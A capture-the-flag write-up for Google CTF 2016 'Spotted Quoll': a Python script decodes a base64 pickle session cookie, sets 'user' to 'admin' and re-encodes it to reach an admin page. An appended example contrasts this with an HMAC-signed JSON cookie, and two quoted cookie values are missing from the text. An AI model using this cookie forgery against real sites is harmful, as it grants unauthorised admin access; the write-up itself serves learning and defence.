Google CTF 2016 // Spotted Quoll (50 points)

This challenge required us to get access to the admin page of a research website about zombies.

We were presented with a page containing a button that links to the website’s /admin page. Clicking this button caused the server to redirect back to the homepage and send a cookie to the browser.

The cookie’s value was:

Our first instinct was that this cookie was base64-encoded. After decoding it, we ended up with the following ASCII text:

This text is a Python pickle! By unpickling the string into a dictionary, we could change the value stored under the ‘user’ key. After re-pickling the dictionary and base64-encoding it into a new cookie, we got access to the admin page and our flag!

import base64
import pickle

def decode(a): return pickle.loads(base64.b64decode(a))
# protocol 0 reproduces the text-form pickle the server sent us
def encode(a): return base64.b64encode(pickle.dumps(a, protocol=0))
a = decode("KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu")  # cookie set by /admin
a['user'] = 'admin'
print(encode(a).decode())  # new cookie value to send back
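The root cause is that the server keeps its session in a cookie it trusts without any integrity check, so the client can rewrite ‘user’ at will. The following example is added here and is not the writeup's or the challenge's own code: it decodes the challenge cookie to show the dictionary it carries, then contrasts it with a minimal HMAC-signed JSON cookie that rejects the same edit (the secret key and cookie layout are assumptions).

```python
import base64
import hashlib
import hmac
import json
import pickle

# Cookie value quoted in the writeup: a base64-encoded, unsigned pickle.
CHALLENGE_COOKIE = ("KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUn"
                    "CnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu")

def load_unsigned_pickle_cookie(cookie):
    # What the challenge server effectively did: trust whatever the client sent.
    return pickle.loads(base64.b64decode(cookie))

# Hardened variant (assumed design, not the challenge server's code):
# JSON instead of pickle, plus an HMAC-SHA256 tag over the payload.
SECRET_KEY = b"constructed-server-side-secret"  # assumption: never leaves the server

def make_signed_cookie(session, key=SECRET_KEY):
    payload = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode())
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return payload.decode() + "." + tag

def load_signed_cookie(cookie, key=SECRET_KEY):
    """Return the session dict, or None if the cookie is malformed or tampered."""
    try:
        payload, tag = cookie.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):  # constant-time comparison
        return None
    return json.loads(base64.urlsafe_b64decode(payload.encode()))

def rewrite_user_keep_tag(cookie, user):
    # The same edit the writeup made to the pickle, applied to the signed cookie
    # while keeping the old tag: the server should now reject it.
    payload, tag = cookie.rsplit(".", 1)
    session = json.loads(base64.urlsafe_b64decode(payload.encode()))
    session["user"] = user
    new_payload = base64.urlsafe_b64encode(json.dumps(session, sort_keys=True).encode())
    return new_payload.decode() + "." + tag

if __name__ == "__main__":
    print(load_unsigned_pickle_cookie(CHALLENGE_COOKIE))  # 'user' is None, unsigned
    good = make_signed_cookie({"user": None})
    print(load_signed_cookie(good))
    print(load_signed_cookie(rewrite_user_keep_tag(good, "admin")))  # None: tampered
```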

